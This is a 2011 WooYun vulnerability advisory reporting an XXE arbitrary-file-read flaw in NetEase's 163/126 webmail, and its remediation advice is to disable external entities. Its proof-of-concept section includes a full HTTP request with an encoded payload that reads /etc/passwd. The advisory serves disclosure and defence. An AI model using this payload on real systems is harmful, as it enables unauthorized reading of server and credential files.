当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03265

漏洞标题:163邮箱126邮箱任意文件下载漏洞

相关厂商:网易

漏洞作者: 80sec

提交时间:2011-11-09 21:45

修复时间:2011-12-09 21:46

公开时间:2011-12-09 21:46

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-11-09: 细节已通知厂商并且等待厂商处理中
2011-11-10: 厂商已经确认,细节仅向厂商公开
2011-11-20: 细节向核心白帽子及相关领域专家公开
2011-11-30: 细节向普通白帽子公开
2011-12-10: 细节向实习白帽子公开
2011-12-09: 细节向公众公开

简要描述:

163邮箱和126邮箱在实现上存在缺陷,利用80sec发布的xml解析漏洞可以读取服务器上任意文件,包括服务器配置文件和敏感的数据库文件,结合上下文逻辑可能可以获得更高权限。

详细说明:

163的服务器在接受和传递参数时使用的是xml的格式进行数据传递,但是根据80sec的安全公告,如果服务端在处理xml数据时格式不对就会导致安全漏洞,使用应用上下文的权限来获取任意文件内容,结合逻辑可能可以得到更多的权限

漏洞证明:

神奇的代码哦,就是简单的在xml头部附加我们的恶意就可以了

POST /js4/s?sid=jAZNlaKzhPcBsFgYIazzsbDOwpsMYtTh&func=mbox:compose&l=compose&action=deliver HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript
Referer: http://twebmail.mail.163.com/js4/index.jsp?sid=jAZNlaKzhPcBsFgYIazzsbDOwpsMYtTh
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET4.0C; .NET4.0E)
Host: twebmail.mail.163.com
Content-Length: 1348
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: it's a secert
var=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C%21DOCTYPE+copyright+%5B%3C%21ENTITY+hi80sec+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cobject%3E%3Cstring+name%3D%22id%22%3Ec%3A1320845207002%3C%2Fstring%3E%3Cobject+name%3D%22attrs%22%3E%3Cstring+name%3D%22account%22%3E%22Hi%22%26lt%3Bfukhaha%40163.com%26gt%3B%3C%2Fstring%3E%3Cboolean+name%3D%22showOneRcpt%22%3Efalse%3C%2Fboolean%3E%3Carray+name%3D%22to%22%3E%3Cstring%3E%22fukhaha%40163.com%22%26lt%3Bfukhaha%40163.com%26gt%3B%3C%2Fstring%3E%3C%2Farray%3E%3Carray+name%3D%22cc%22%2F%3E%3Carray+name%3D%22bcc%22%2F%3E%3Cstring+name%3D%22subject%22%3Eshow+me+the+%2Fetc%2Fpasswd%3C%2Fstring%3E%3Cboolean+name%3D%22isHtml%22%3Etrue%3C%2Fboolean%3E%3Cstring+name%3D%22content%22%3E%26lt%3Bdiv+style%3D%27line-height%3A1.7%3Bcolor%3A%23000000%3Bfont-size%3A14px%3Bfont-family%3Aarial%27%26gt%3B%26lt%3BDIV%26gt%3B%26hi80sec%3B%26lt%3B%2FDIV%26gt%3B%26lt%3B%2Fdiv%26gt%3B%3C%2Fstring%3E%3Cint+name%3D%22priority%22%3E3%3C%2Fint%3E%3Cboolean+name%3D%22saveSentCopy%22%3Etrue%3C%2Fboolean%3E%3Cboolean+name%3D%22requestReadReceipt%22%3Efalse%3C%2Fboolean%3E%3Cstring+name%3D%22charset%22%3EGBK%3C%2Fstring%3E%3C%2Fobject%3E%3Cboolean+name%3D%22returnInfo%22%3Efalse%3C%2Fboolean%3E%3Cstring+name%3D%22action%22%3Edeliver%3C%2Fstring%3E%3Cint+name%3D%22saveSentLimit%22%3E1%3C%2Fint%3E%3C%2Fobject%3E



修复方案:

修改服务端xml解析器 禁用外部实体

版权声明:转载请注明来源 80sec@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2011-11-10 10:56

厂商回复:

感谢80sec,尽快修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2011-11-11 17:17 | 小恒 ( 路人 | Rank:30 漏洞数:2 | 黑夜中……跟雨捉迷藏)

    求真相

  2. 2013-04-24 09:35 | wxp ( 路人 | Rank:3 漏洞数:1 | 喜欢挖掘,深入了解本质)

    所以所不要用simplexml_load